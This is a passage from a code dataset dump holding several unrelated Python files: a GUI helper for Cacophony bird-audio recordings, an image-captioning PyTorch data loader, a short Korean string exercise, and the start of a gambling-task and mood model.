get_recording_information_for_a_single_recording(recording_id)\n print('recording_information ', recording_information) \n if recording_information == None: \n print('recording_information == None') \n return\n \n recording = recording_information['recording'] \n recordingDateTime = recording['recordingDateTime'] \n relativeToDawn = recording['relativeToDawn'] \n relativeToDusk = recording['relativeToDusk'] \n duration = recording['duration'] \n \n location = recording['location'] \n coordinates = location['coordinates'] \n locationLat = coordinates[0] \n locationLong = coordinates[1] \n \n version = recording['version'] \n batteryLevel = recording['batteryLevel'] \n \n additionalMetadata = recording['additionalMetadata'] \n phoneModel = additionalMetadata['Phone model'] \n androidApiLevel = additionalMetadata['Android API Level'] \n \n Device = recording['Device'] \n deviceId = Device['id']\n device_name = Device['devicename']\n \n nightRecording = 'false'\n \n if relativeToDusk is not None:\n if relativeToDusk > 0:\n nightRecording = 'true' \n elif relativeToDawn is not None:\n if relativeToDawn < 0:\n nightRecording = 'true' \n \n update_recording_in_database(recordingDateTime, relativeToDawn, relativeToDusk, duration, locationLat, locationLong, version, batteryLevel, phoneModel, androidApiLevel, deviceId, nightRecording, device_name, recording_id)\n print('Finished updating recording information for recording ', recording_id)\n \ndef test_update_recording_information_for_single_recording():\n update_recording_information_for_single_recording('291047')\n \ndef update_recording_in_database(recordingDateTime, relativeToDawn, relativeToDusk, duration, locationLat, locationLong, version, batteryLevel, phoneModel,androidApiLevel, deviceId, nightRecording, device_name, recording_id):\n try:\n conn = get_database_connection()\n # https://www.sqlitetutorial.net/sqlite-python/update/\n sql = ''' UPDATE recordings \n SET recordingDateTime = ?,\n relativeToDawn = ?,\n relativeToDusk = ?,\n duration = ?,\n locationLat = ?,\n locationLong = ?,\n version = ?,\n batteryLevel = ?,\n phoneModel = ?,\n androidApiLevel = ?,\n deviceId = ?,\n nightRecording = ?,\n device_name = ?\n WHERE recording_id = ? '''\n cur = get_database_connection().cursor()\n cur.execute(sql, (recordingDateTime, relativeToDawn, relativeToDusk, duration, locationLat, locationLong, version, batteryLevel, phoneModel, androidApiLevel, deviceId, nightRecording, device_name, recording_id))\n get_database_connection().commit()\n except Exception as e:\n print(e, '\\n')\n print('\\t\\tUnable to insert recording ' + str(recording_id), '\\n')\n \ndef test_update_recording_in_database():\n update_recording_in_database('2018-04-04T17:07:01.000Z', 3, 1, 2, -22.2, 178.1, '23b', 77, 'ZTE phone',7, 1234, 'true', 'grants shed3', 291047)\n \n \ndef get_recording_information_for_a_single_recording(recording_id):\n user_token = get_cacophony_user_token()\n\n get_a_token_for_recording_endpoint = parameters.server_endpoint + parameters.get_information_on_single_recording + recording_id\n\n headers = {'Authorization': user_token}\n\n resp_for_getting_a_recordingToken = requests.request(\"GET\", get_a_token_for_recording_endpoint, headers=headers)\n if resp_for_getting_a_recordingToken.status_code != 200:\n print('Could not get download token')\n return None\n recording_data_for_single_recording = resp_for_getting_a_recordingToken.json() \n \n return recording_data_for_single_recording \n\ndef test_get_recording_information_for_a_single_recording():\n recording_data = get_recording_information_for_a_single_recording('197294')\n print('recording_data is: ', recording_data)\n\ndef update_recording_information_for_all_local_database_recordings():\n# conn = get_database_connection()\n cur = get_database_connection().cursor()\n cur.execute(\"SELECT recording_id, recordingDateTime FROM recordings\")\n \n rows = cur.fetchall()\n \n for row in rows:\n # Don't update if we already have recordingDateTime\n recordingDateTime = row[1]\n if not recordingDateTime:\n print(recordingDateTime, ' is empty so will update record')\n recording_id = row[0]\n update_recording_information_for_single_recording(recording_id)\n print('Finished updating recording information')\n \ndef test_update_recording_information_for_all_local_database_recordings():\n update_recording_information_for_all_local_database_recordings()\n\ndef get_audio_recordings_with_tags_information_from_server(user_token, recording_type, deviceId):\n print('Retrieving recordings basic information from Cacophony Server\\n')\n url = parameters.server_endpoint + parameters.query_available_recordings\n \n where_param = {}\n where_param['type'] = recording_type \n where_param['DeviceId'] = deviceId\n json_where_param = json.dumps(where_param)\n querystring = {\"tagMode\":\"tagged\", \"where\":json_where_param} \n headers = {'Authorization': user_token} \n\n resp = requests.request(\"GET\", url, headers=headers, params=querystring)\n \n if resp.status_code != 200:\n # This means something went wrong.\n print('Error from server is: ', resp.text)\n sys.exit('Could not download file - exiting') \n \n \n data = resp.json()\n \n recordings = data['rows']\n \n return recordings \n\ndef test_get_audio_recordings_with_tags_information_from_server():\n user_token = get_cacophony_user_token()\n recording_type = 'audio'\n deviceId = 379\n recordings = get_audio_recordings_with_tags_information_from_server(user_token, recording_type, str(deviceId))\n for recording in recordings:\n print(recording, '\\n')\n\ndef get_and_store_tag_information_for_recording(recording_id, deviceId, device_name, device_super_name):\n single_recording_full_information = get_recording_information_for_a_single_recording(recording_id)\n recording = single_recording_full_information['recording'] \n tags = recording['Tags'] \n for tag in tags:\n server_Id = tag['id']\n what = tag['what']\n detail = tag['detail']\n confidence = tag['confidence']\n startTime = tag['startTime']\n duration = tag['duration']\n automatic = tag['automatic']\n version = tag['version']\n createdAt = tag['createdAt']\n tagger =tag['tagger'] \n tagger_username = tagger['username']\n what = tag['what']\n insert_tag_into_database(recording_id,server_Id, what, detail, confidence, startTime, duration, automatic, version, createdAt, tagger_username, deviceId, device_name, device_super_name)\n \n \ndef test_get_and_store_tag_information_for_recording():\n get_and_store_tag_information_for_recording(str(197294), 123)\n \ndef insert_tag_into_database(recording_id,server_Id, what, detail, confidence, startTime, duration, automatic, version, createdAt, tagger_username, deviceId, device_name, device_super_name ):\n # Use this for tags that have been downloaded from the server\n try:\n if check_if_tag_alredy_in_database(server_Id) == True:\n print('tag exists')\n return\n else:\n print('going to insert tag')\n\n sql = ''' INSERT INTO tags(recording_id,server_Id, what, detail, confidence, startTime, duration, automatic, version, createdAt, tagger_username, deviceId, device_name, device_super_name)\n VALUES(?,?,?,?,?,?,?,?,?,?,?,?,?,?) '''\n cur = get_database_connection().cursor()\n cur.execute(sql, (recording_id,server_Id, what, detail, confidence, startTime, duration, automatic, version, createdAt, tagger_username, deviceId, device_name, device_super_name))\n get_database_connection().commit()\n except Exception as e:\n print(e, '\\n')\n print('\\t\\tUnable to insert tag ' + str(recording_id), '\\n') \n \ndef insert_locally_created_tag_into_database(recording_id,what, detail, confidence, startTime, duration, createdAt, tagger_username, deviceId, device_name, device_super_name ):\n # Use this is the tag was created in this application, rather than being downloaded from the server - becuase some fiels are mission e.g. server_Id\n try: \n\n sql = ''' INSERT INTO tags(recording_id, what, detail, confidence, startTime, duration, createdAt, tagger_username, deviceId, device_name, device_super_name)\n VALUES(?,?,?,?,?,?,?,?,?,?,?) '''\n cur = get_database_connection().cursor()\n cur.execute(sql, (recording_id, what, detail, confidence, startTime, duration, createdAt, tagger_username, deviceId, device_name, device_super_name))\n get_database_connection().commit()\n except Exception as e:\n print(e, '\\n')\n print('\\t\\tUnable to insert tag ' + str(recording_id), '\\n') \n \ndef test_insert_tag_into_database():\n insert_tag_into_database(1,135940, 'bat', 'detail', 'confidence', 1.2, 2.5, 'automatic', 256, '2019-06-20T04:14:24.811Z', 'timhot', 'deviceId', 'device_name', 'device_super_name')\n \ndef check_if_tag_alredy_in_database(server_Id):\n cur = get_database_connection().cursor()\n cur.execute(\"SELECT server_Id FROM tags WHERE server_Id = ?\", (server_Id,))\n data=cur.fetchone()\n if data is None:\n return False\n else:\n return True\n\ndef test_check_if_tag_alredy_in_database(): \n check_if_tag_alredy_in_database(135939) \n \ndef get_all_tags_for_all_devices_in_local_database():\n user_token = get_cacophony_user_token()\n unique_devices = get_unique_devices_stored_locally()\n\n for unique_device in unique_devices: \n deviceId = unique_device[0]\n device_name = unique_device[1]\n device_super_name = unique_device[2] \n \n recording_type = 'audio'\n recordings_with_tags = get_audio_recordings_with_tags_information_from_server(user_token, recording_type, deviceId)\n\n for recording_with_tag in recordings_with_tags:\n print('device is', deviceId, '\\n') \n recording_id =recording_with_tag['id']\n print('recording_id ', recording_id, '\\n')\n get_and_store_tag_information_for_recording(str(recording_id), deviceId, device_name, device_super_name)\n print('Finished getting tags from server')\n \ndef test_get_all_tags_for_all_devices_in_local_database():\n get_all_tags_for_all_devices_in_local_database() \n \ndef get_unique_devices_stored_locally():\n cur = get_database_connection().cursor()\n cur.execute(\"SELECT DISTINCT deviceId, device_name, device_super_name FROM recordings\") \n rows = cur.fetchall()\n return rows \n \n \ndef test_get_unique_devices_stored_locally():\n unique_devices = get_unique_devices_stored_locally()\n for unique_device in unique_devices:\n print(unique_device, '\\n')\n \ndef scan_local_folder_for_recordings_not_in_local_db_and_update(device_name, device_super_name):\n recordings_folder = getRecordingsFolder()\n for filename in os.listdir(recordings_folder):\n recording_id = filename.replace('-','.').split('.')[0]\n print(recording_id)\n cur = get_database_connection().cursor()\n cur.execute(\"SELECT * FROM recordings WHERE recording_id = ?\",(recording_id,))\n \n # https://stackoverflow.com/questions/16561362/python-how-to-check-if-a-result-set-is-empty\n row = cur.fetchone()\n if row == None:\n # Get the information for this recording from server and insert into local db\n # update_recording_information_for_single_recording(recording_id)\n filename = recording_id + '.m4a'\n insert_recording_into_database(recording_id,filename, device_name,device_super_name) # The device name will be updated next when getting infor from server\n # Now update this recording with information from server\n update_recording_information_for_single_recording(recording_id)\n \ndef test_scan_local_folder_for_recordings_not_in_local_db_and_update():\n scan_local_folder_for_recordings_not_in_local_db_and_update('grants shed')\n \ndef create_tags_from_folder_of_unknown_images():\n # This will probably only get used to recreate the unknown tags from the unknown images - as I'm not sure where the text file of this is/exists\n home = str(Path.home())\n unknown_images_folder = home + '/Work/Cacophony/images/unknown'\n for filename in os.listdir(unknown_images_folder):\n fileparts = filename.replace('_','.').split('.')\n recording_id = fileparts[0]\n print('recording_id ', recording_id)\n startWholeSecond = fileparts[1]\n print('startWholeSecond ', startWholeSecond)\n startPartSecond = fileparts[2]\n print('startPartSecond ', startPartSecond)\n startTimeSeconds = startWholeSecond + '.' + startPartSecond\n insert_locally_created_tag_into_database(recording_id=recording_id, what='unknown', detail=None, confidence=None, startTime=startTimeSeconds, duration=1.5, createdAt='2019-06-20T05:39:28.391Z', tagger_username='timhot', deviceId=378, device_name='fpF7B9AFNn6hvfVgdrJB', device_super_name='Hammond Park')\n print('Finished creating unknown tags from image files')\n \ndef test_create_tags_from_folder_of_unknown_images():\n create_tags_from_folder_of_unknown_images()\n \ndef update_local_tags_with_version():\n # This is probably only used the once to modify intial rows to indicate they are from my first morepork tagging of Hammond Park\n cur = get_database_connection().cursor()\n cur.execute(\"select ID from tags\")\n \n rows = cur.fetchall() \n \n for row in rows: \n ID = row[0] \n print('ID ', ID) \n sql = ''' UPDATE tags\n SET version = ? \n WHERE ID = ?'''\n cur = get_database_connection().cursor()\n cur.execute(sql, ('morepork_base', ID))\n \n get_database_connection().commit() \n \ndef test_update_local_tags_with_version():\n update_local_tags_with_version()\n \n# def create_clips(device_super_name, what, version, clips_ouput_folder):\ndef create_clips(device_super_name, what, version, run_base_folder, run_folder):\n print(device_super_name, what, version, run_base_folder, run_folder) \n# what_without_spaces = re.sub(' ', '', what)\n# what_without_spaces_dashes = re.sub('-', '_', what_without_spaces) \n# clips_ouput_folder = run_base_folder + '/' + run_folder + '/' + 'audio_clips' + '/' + what_without_spaces_dashes\n# \n# \n# sql = ''' SELECT recording_Id, startTime, duration FROM tags WHERE device_super_name=? AND what=? AND version=? ''' \n# cur = get_database_connection().cursor()\n# cur.execute(sql, (device_super_name, what, version,)) \n# rows = cur.fetchall() \n# \n# count = 0\n# \n# for row in rows: \n# print('Creating clip ', count, ' of ', len(rows))\n# recording_Id = row[0]\n# start_time_seconds = row[1]\n# duration_seconds = row[2]\n# create_wav_clip(recording_Id, start_time_seconds, duration_seconds, clips_ouput_folder) \n# count = count + 1 \n \ndef create_wav_clip(recording_Id, start_time_seconds, duration_seconds, clips_ouput_folder):\n print(recording_Id)\n audio_in_path = getRecordingsFolder() + '/' + str(recording_Id) + '.m4a'\n# audio_out_folder = getRecordingsFolder() + '/' + what\n if not os.path.exists(clips_ouput_folder):\n# os.mkdir(clips_ouput_folder)\n os.makedirs(clips_ouput_folder) \n \n audio_out_path = clips_ouput_folder + '/' + str(recording_Id) + '_' + str(start_time_seconds) + '_' + str(duration_seconds) + '.wav'\n# print('audio_in_path ', audio_in_path)\n# print('audio_out_path ', audio_out_path)\n# if not os.path.exists(audio_in_path):\n# print('Can not find ', audio_in_path)\n# else:\n# print('Found it')\n \n create_wav(audio_in_path, audio_out_path, start_time_seconds, duration_seconds)\n \n \ndef create_folder(folder_to_create):\n if folder_to_create is None:\n print(\"Please enter a folder name\")\n return\n if not folder_to_create:\n print(\"Please enter a folder name\")\n return\n \n if not os.path.exists(folder_to_create):\n os.mkdir(folder_to_create)\n print(\"Folder \" , folder_to_create , \" Created \") \n \n \n\n\n \ndef run_processDir():\n processDir(search_path,arff_path)\n \n \ndef create_wav(audio_in_path, audio_out_path, start_time_seconds, duration_seconds): \n print('start_time_seconds ', start_time_seconds) \n print('duration_seconds ', duration_seconds) \n y, sr = librosa.load(audio_in_path) \n \n clip_start_array = int((sr * start_time_seconds))\n print('clip_start_array ', clip_start_array)\n clip_end_array = clip_start_array + int((sr * duration_seconds)) \n \n \n if clip_end_array > y.shape[0]:\n print('Clip would end after end of recording')\n return\n \n clip_call_by_array = y[clip_start_array:clip_end_array] \n \n \n \n \n #Save the file \n# wavfile.write(filename=audio_out_path, rate=sr, data=clip_call_by_array)\n# sf.write(file, data, samplerate, subtype, endian, format, closefd)\n# sf.write(file=audio_out_path, data=clip_call_by_array, samplerate=sr, subtype, endian, format, closefd)\n # https://pysoundfile.readthedocs.io/en/0.9.0/\n sf.write(audio_out_path, clip_call_by_array, sr, 'PCM_24')\n# sf.write(audio_out_path, y, sr, 'PCM_24') \n \n\n# run_processDir()\n\n\ndef test_create_wav():\n create_wav('/home/tim/Work/Cacophony/opensmile_weka/m4a_files/161945.m4a', '/home/tim/Work/Cacophony/opensmile_weka/TestAudioInput/161945.wav') \n create_wav('/home/tim/Work/Cacophony/opensmile_weka/m4a_files/161946.m4a', '/home/tim/Work/Cacophony/opensmile_weka/TestAudioInput/161946.wav') \n processDir(search_path,arff_path)\n\n \ndef create_arff_file(base_folder, run_folder, clip_folder, openSmile_config_file):\n clip_folder_without_spaces = re.sub(' ', '_', clip_folder)\n print('base_folder ', base_folder)\n cwd = os.getcwd()\n \n openSmile_config_file_template = cwd + '/template_files/openSmile_config_files/' + openSmile_config_file\n print('openSmile_config_file_template ', openSmile_config_file_template)\n openSmile_config_file_for_this_run = base_folder + '/' + run_folder + '/' + openSmile_config_file\n print('openSmile_config_file_for_this_run ', openSmile_config_file_for_this_run)\n shutil.copy2(openSmile_config_file_template, openSmile_config_file_for_this_run)\n \n# arff_template_file_path = cwd + '/template_files/' + arff_template_file\n# arff_template_file_for_this_run = base_folder + '/' + run_folder + '/' + arff_template_file\n# shutil.copy2(arff_template_file_path, arff_template_file_for_this_run)\n \n print('clip_folder', clip_folder_without_spaces)\n \n \n searchDir = base_folder + '/' + run_folder + '/audio_clips/' + clip_folder_without_spaces\n arffDir = base_folder + '/' + run_folder + '/arff_files' \n if not os.path.exists(arffDir):\n os.mkdir(arffDir)\n \n print('searchDir', searchDir)\n print('arffDir', arffDir)\n \n processDir(searchDir, arffDir, openSmile_config_file_for_this_run)\n \n# First version written by Jonah Dearden\ndef processDir( searchDir, arffDir, openSmile_config_file_for_this_run):\n print('openSmile_config_file_for_this_run ', openSmile_config_file_for_this_run)\n \n os.chdir(searchDir)\n i=0\n list_of_files=[]\n # https://www.tutorialspoint.com/python/os_walk.htm\n for root,dir,files in os.walk(searchDir):\n for f in files:\n if re.match(r'.*\\.wav',f):\n list_of_files.append(root+'/'+f)\n \n os.chdir(arffDir)\n \n for i in list_of_files: \n print(i)\n \n print('openSmile_config_file_for_this_run ', openSmile_config_file_for_this_run)\n \n for i in list_of_files: \n name1=re.sub(r'(' + searchDir + '/)(.*)(\\.wav)',r'\\2',i)\n os.system('SMILExtract -C ' + openSmile_config_file_for_this_run + ' -I '+i+' -O '+arffDir+'/'+name1+'.mfcc.arff')\n \n\n \ndef merge_arffs(base_folder, run_folder, arff_template_file):\n #path to directory with arffs\n arffDir = base_folder + '/' + run_folder + '/arff_files'\n arrf_filename = re.sub('_template', '', arff_template_file)\n cwd = os.getcwd()\n arff_template_file_path = cwd + '/template_files/arff_template_files/' + arff_template_file\n arff_template_file_for_this_run = base_folder + '/' + run_folder + '/arff_files/' + arrf_filename\n shutil.copy2(arff_template_file_path, arff_template_file_for_this_run)\n \n os.chdir(arffDir)\n \n counter = 0\n\n #Opens joinedArff.arff and appends\n with open(arrf_filename, \"a\") as f:\n #for each file with the .arff ext in the directroy\n for file in glob.glob(\"*.arff\"):\n #Open the file and read line 996\n print(file)\n a = open(file, \"r\")\n lines = a.readlines()\n \n x = lines[995]\n #Replace class label if necessary\n #This is unnecessary if you have already assigned the classes using the OpenSmile conf.\n #x = x.replace(\"unknown\", \"person\")\n #Writes that line to the joinedArff file\n f.write(x + \"\\n\")\n a.close()\n \n f.close() \n \n arff_template_file_for_this_run_in_run_folder = base_folder + '/' + run_folder + '/' + arrf_filename\n# os.rename(arff_template_file_for_this_run, arff_template_file_for_this_run_in_run_folder)\n shutil.move(arff_template_file_for_this_run, arff_template_file_for_this_run_in_run_folder)\n \n print('Merged arff file created in ', base_folder, '/',run_folder)\n \ndef get_unique_whats_from_local_db():\n cur = get_database_connection().cursor()\n cur.execute(\"SELECT DISTINCT what FROM tags\") \n rows = cur.fetchall() \n \n unique_whats = []\n for row in rows:\n unique_whats.append(row[0])\n return unique_whats \n\ndef getOpenSmileConfigFiles():\n cwd = os.getcwd()\n openSmileConfigFileDir = cwd + '/template_files/openSmile_config_files/'\n openSmileConfigFiles = []\n for file in os.listdir(openSmileConfigFileDir):\n openSmileConfigFiles.append(file) \n \n return openSmileConfigFiles\n \ndef getArffTemplateFiles():\n cwd = os.getcwd()\n arrTemplateFileDir = cwd + '/template_files/arff_template_files/'\n\n arffTemplateFiles = []\n for file in os.listdir(arrTemplateFileDir):\n print(file)\n arffTemplateFiles.append(file) \n \n return arffTemplateFiles \n\n\n\ndef choose_clip_folder(base_folder, run_folder):\n start_folder = base_folder + '/' + run_folder + '/audio_clips/'\n clip_folder = filedialog.askdirectory(initialdir=start_folder, title = \"Open the folder you want (Just selecting it won't choose it)\")\n parts = re.split('/', clip_folder)\n clip_folder = parts[len(parts)-1] \n return clip_folder \n\n \n\n \n \n \n ","sub_path":"python/GUI/gui_functions.py","file_name":"gui_functions.py","file_ext":"py","file_size_in_byte":36343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"480193981","text":"import os\nimport torch\nfrom torchvision import transforms\nfrom lib.config import cfg\nfrom datasets import coco_dataset, aic_dataset, combined_dataset\nimport samplers.distributed\nimport numpy as np\ndef padding_sentences(sentences, max_length=None, padding_index=0):\n #target -1 \n #input 0\n if type(sentences[0][0])==list: # [[5*s],[5*s],...,[5*s]] or [s11,s12,s13,...]\n sentences_ = []\n for ss in sentences:#[s1,s2,s3,...,s4,s5]\n sentences_ += ss \n sentences = sentences_\n if max_length==None:\n max_length = max([len(s) for s in sentences])\n pad_sentences = []\n for s in sentences:\n pad_s = s+[padding_index]*(max_length-len(s))\n pad_sentences.append(pad_s)\n return pad_sentences, max_length\n\ndef sample_collate(batch):\n #batch [(indice1, input_seq1,...),(indice2, input_seq2)]\n #zip(*batch)\n #indices = (indice1, indice2)\n #input_seq = (input_seq1, input_seq2)\n #image_ids = (imageid1,id2,...)\n dataset_names = [b[1] for b in batch]\n info_items = [b[0] for b in batch]\n indices, input_seq, target_seq, gv_feat, att_feats, image_ids = zip(*info_items)\n\n\n indices = np.stack(indices, axis=0).reshape(-1)\n image_ids = np.stack(image_ids, axis=0).reshape(-1)\n # input_seq = torch.cat([torch.from_numpy(b) for b in input_seq], 0)# b 5,L 5*bs,L\n # target_seq = torch.cat([torch.from_numpy(b) for b in target_seq], 0)\n input_seq, max_input_length = padding_sentences(input_seq, max_length=None, padding_index=0)\n target_seq, _ = padding_sentences(target_seq, max_length=max_input_length, padding_index=-1)\n input_seq = torch.LongTensor(input_seq)\n target_seq = torch.LongTensor(target_seq)\n\n #input_lengths = [b.shape[1] for b in input_seq] #5,L\n #max_input_length = max(input_lengths)\n\n gv_feat = torch.cat([torch.from_numpy(b) for b in gv_feat], 0)\n\n atts_num = [x.shape[0] for x in att_feats] #x = bbox, 2048\n max_att_num = np.max(atts_num)\n\n feat_arr = []\n mask_arr = []\n for i, num in enumerate(atts_num):\n tmp_feat = np.zeros((1, max_att_num, att_feats[i].shape[1]), dtype=np.float32)\n tmp_feat[:, 0:att_feats[i].shape[0], :] = att_feats[i]\n feat_arr.append(torch.from_numpy(tmp_feat))\n\n tmp_mask = np.zeros((1, max_att_num), dtype=np.float32)\n tmp_mask[:, 0:num] = 1\n mask_arr.append(torch.from_numpy(tmp_mask))\n\n att_feats = torch.cat(feat_arr, 0)\n att_mask = torch.cat(mask_arr, 0)\n\n return indices, input_seq, target_seq, gv_feat, att_feats, att_mask, image_ids, dataset_names\n\ndef sample_collate_val(batch):\n indices, gv_feat, att_feats, image_ids = zip(*batch)\n \n indices = np.stack(indices, axis=0).reshape(-1)\n image_ids = np.stack(image_ids, axis=0).reshape(-1)\n gv_feat = torch.cat([torch.from_numpy(b) for b in gv_feat], 0)\n\n atts_num = [x.shape[0] for x in att_feats]\n max_att_num = np.max(atts_num)\n\n feat_arr = []\n mask_arr = []\n for i, num in enumerate(atts_num):\n tmp_feat = np.zeros((1, max_att_num, att_feats[i].shape[1]), dtype=np.float32)\n tmp_feat[:, 0:att_feats[i].shape[0], :] = att_feats[i]\n feat_arr.append(torch.from_numpy(tmp_feat))\n\n tmp_mask = np.zeros((1, max_att_num), dtype=np.float32)\n tmp_mask[:, 0:num] = 1\n mask_arr.append(torch.from_numpy(tmp_mask))\n\n att_feats = torch.cat(feat_arr, 0)\n att_mask = torch.cat(mask_arr, 0)\n\n return indices, gv_feat, att_feats, att_mask, image_ids\n\n\ndef load_train(distributed, epoch, data_set):\n sampler = samplers.distributed.DistributedSampler(data_set, epoch=epoch) \\\n if distributed else None\n shuffle = cfg.DATA_LOADER.SHUFFLE if sampler is None else False\n \n loader = torch.utils.data.DataLoader(\n data_set, \n batch_size = cfg.TRAIN.BATCH_SIZE, #10\n shuffle = shuffle, #True\n num_workers = cfg.DATA_LOADER.NUM_WORKERS, #4\n drop_last = cfg.DATA_LOADER.DROP_LAST, #True\n pin_memory = cfg.DATA_LOADER.PIN_MEMORY, #True\n sampler = sampler, \n collate_fn = sample_collate\n )\n return loader\n\ndef load_val(image_ids_path, gv_feat_path, att_feats_folder, dataset_name):\n if dataset_name=='coco':\n dataset = coco_dataset.CocoDataset(\n image_ids_path = image_ids_path, \n input_seq = None, \n target_seq = None, \n gv_feat_path = gv_feat_path, \n att_feats_folder = att_feats_folder,\n seq_per_img = 1, \n max_feat_num = cfg.COCO_DATA_LOADER.MAX_FEAT,\n id2name_path = cfg.COCO_DATA_LOADER.ID2NAME,\n annotation_path = cfg.COCO_DATA_LOADER.COCO_ANNOTATION\n )\n elif dataset_name=='aic': #\n dataset = aic_dataset.AICDataset(\n image_ids_path = image_ids_path, #\n input_seq = None, #\n target_seq = None, #\n gv_feat_path = gv_feat_path, #\n att_feats_folder = att_feats_folder, #\n seq_per_img = 1,#5\n max_feat_num = cfg.AIC_DATA_LOADER.MAX_FEAT,#-1\n img_dir=cfg.AIC_DATA_LOADER.VAL_IMG_DIR, #val/test the same\n processedimg_dir=cfg.AIC_DATA_LOADER.VAL_PROCESSEDIMG_DIR #val/test the same\n )\n\n loader = torch.utils.data.DataLoader(\n dataset, \n batch_size = cfg.TEST.BATCH_SIZE,\n shuffle = False, \n num_workers = cfg.DATA_LOADER.NUM_WORKERS, \n drop_last = False, \n pin_memory = cfg.DATA_LOADER.PIN_MEMORY, \n collate_fn = sample_collate_val\n )\n return loader","sub_path":"datasets/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"74236604","text":"'''\n인자로 전달된 두 개의 문자열 중 길이가 더 긴 문자열을 출력하는 함수를 정의하고\n\n\n결과를 출력하는 프로그램을 작성하십시오.\n'''\n\ndef calc_str_length():\n str = input()\n\n strings = str.split(\",\")\n\n longestString = ''\n\n for string in strings:\n strippedStr = string.strip()\n if len(strippedStr) > len(longestString):\n longestString = strippedStr\n\n return longestString\n\nprint(calc_str_length())\n","sub_path":"PYTHON/파이썬_프로그래밍_기초_문제풀이/08/08-09.py","file_name":"08-09.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"108706587","text":"\n\nimport numpy as np\nimport pandas as pd\n\nfrom wfpt import wfpt_like, wfpt_gen\nfrom scipy.stats import norm\nfrom RunDEMC import dists\n\nclass MMIModel():\n \"\"\"Generative model of the MMI task\"\"\"\n default_params = {'gamma': 0.5,\n 'gamma_neg': None,\n #'beta': 1,\n #'beta_certain': None,\n 'a': 3.0,\n 'w': 0.5,\n 't0': 0.25\n #'p0': 0.5,\n }\n \n def __init__(self, params=None, max_time=3.0, \n trange_nsamp=1000, gen_nsamp=1000,\n wfpt_nsamp=5000, ignore_non_resp=False):\n # set params based on defaults and those passed in\n self.params = dict(**self.default_params)\n if params is not None:\n self.params.update(params)\n \n # set the max_time\n self.max_time = max_time\n self.trange_nsamp = trange_nsamp\n self.gen_nsamp = gen_nsamp\n self.wfpt_nsamp = wfpt_nsamp\n self.ignore_non_resp = ignore_non_resp\n \n # initialize stuff\n self.p = 0.5\n if self.params['gamma_neg'] is None:\n # just set it to gamma\n self.params['gamma_neg'] = self.params['gamma']\n# if self.params['beta_certain'] is None:\n# # just set it to beta\n# self.params['beta_certain'] = self.params['beta']\n \n def update_p(self, trial):\n if trial.Choice == 'Gamble':\n RPE = self._apply_gamma(trial['OutcomeAmount']) - trial['LTA']\n #I = float(trial['Won'])\n #beta = self.params['beta']\n elif trial.Choice == 'None':\n # they gambled with a non-response,\n # but maybe didn't make a prediction\n # for now, just treat it like an active gamble\n RPE = self._apply_gamma(trial['OutcomeAmount']) - trial['LTA']\n #I = float(trial['Won'])\n #beta = self.params['beta']\n else:\n # they took certain value\n RPE = 0.0\n \n # move back towards initial probability\n #I = self.params['p0']\n\n # use the certain beta if there is one\n #beta = self.params['beta_certain']\n \n # calc r \n # (we may need to add a temperature param here)\n # (we also could weigh positive and negative RPE differently)\n #r = np.exp(-np.abs(RPE))\n r = 1.0\n \n # update p\n #self.p = r*beta*self.p + (1-r*beta)*I\n self.p=trial['win_prob']\n #self.p = np.clip(self.p + self.params['beta']*RPE, 0, 1)\n \n return self.p, RPE, r\n \n def _apply_gamma(self, value):\n # apply positive or neg gamma (may simply be symmetric)\n if value < 0:\n gamma = self.params['gamma_neg']\n else:\n gamma = self.params['gamma']\n return np.sign(value)*np.abs(value)**gamma\n \n def calc_E(self, trial):\n # determine the certain and gambling expected values\n EC = self._apply_gamma(trial['CertainAmount'])\n EG = self.p*self._apply_gamma(trial['GreaterAmount']) + \\\n (1-self.p)*self._apply_gamma(trial['LesserAmount'])\n return EC,EG\n \n def calc_Reward(self, trial):\n # determine the subjective value\n rwrd = self._apply_gamma(trial['OutcomeAmount'])\n \n return rwrd\n \n def calc_latents(self, trial, latents):\n latents2 = {}\n #latents2['CA_sum'] = self.params['lambda'] * latents['CA_sum']\n #latents2['EG_sum'] = self.params['lambda'] * latents['EG_sum']\n\n latents2['RPE_sum'] = self.params['lambda'] * latents['RPE_sum']\n latents2['LTA_sum'] = self.params['lambda'] * latents['LTA_sum']\n\n latents2['LTA_sum'] = latents2['LTA_sum'] + trial['LTA']\n\n if trial.Choice == 'Gamble':\n #latents2['EG_sum'] = latents2['EG_sum'] + trial['EG']\n #latents2['LTA_sum'] = latents2['LTA_sum'] + trial['EG']\n latents2['RPE_sum'] = latents2['RPE_sum'] + trial['RPE']\n # else:\n # #latents2['CA_sum'] = latents2['CA_sum'] + trial['EC']\n # latents2['LTA_sum'] = latents2['LTA_sum'] + trial['EC']\n return latents2\n \n def calc_trial_like(self, trial, save_post=False):\n # Compute likelihood from reaction time\n # see what response was made and map it to the choice\n if trial.Choice == 'Gamble':\n choice = np.array([1])\n elif trial.Choice == 'Certain':\n choice = np.array([2])\n else:\n # they made no choice\n # we could consider skipping these\n choice = np.array([0])\n\n # calc the like\n if self.ignore_non_resp and choice==np.array([0]):\n log_like = 0.0\n else:\n # calc the log like\n log_like = np.log(wfpt_like(choice, np.array([trial.RT]), \n v_mean=trial['Ediff'], a=self.params['a'], \n w_mode=self.params['w'], t0=self.params['t0'],\n nsamp=self.wfpt_nsamp,\n max_time=self.max_time,\n trange_nsamp=self.trange_nsamp))[0]\n \n # * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n # if the trial is also a mood trial we could also add in a like calc\n # for a model, too\n # * * * * * * * * * * * * * * * * * * * * * * * * * * * *\n if np.isnan(trial['Mood']):\n mood_log_like = 0.0 \n \n if not np.isnan(trial['Mood']):\n curr_mood = dists.logit(trial['Mood']/1000)\n pred_mood = self.params['b'] + \\\n self.params['w_LTA'] * trial['LTA_sum'] + \\\n self.params['w_RPE'] * trial['RPE_sum']\n log_like = log_like + np.log(norm.pdf(curr_mood, pred_mood, np.sqrt(self.params['s_v'])))\n \n ##Mood_log_likelihood \n mood_log_like = np.log(norm.pdf(curr_mood, pred_mood, np.sqrt(self.params['s_v'])))\n \n # see if running conditional sim\n if save_post:\n # run wfpt_gen\n choices, rts = wfpt_gen(v_mean=trial['Ediff'], \n a=self.params['a'], \n w_mode=self.params['w'], \n 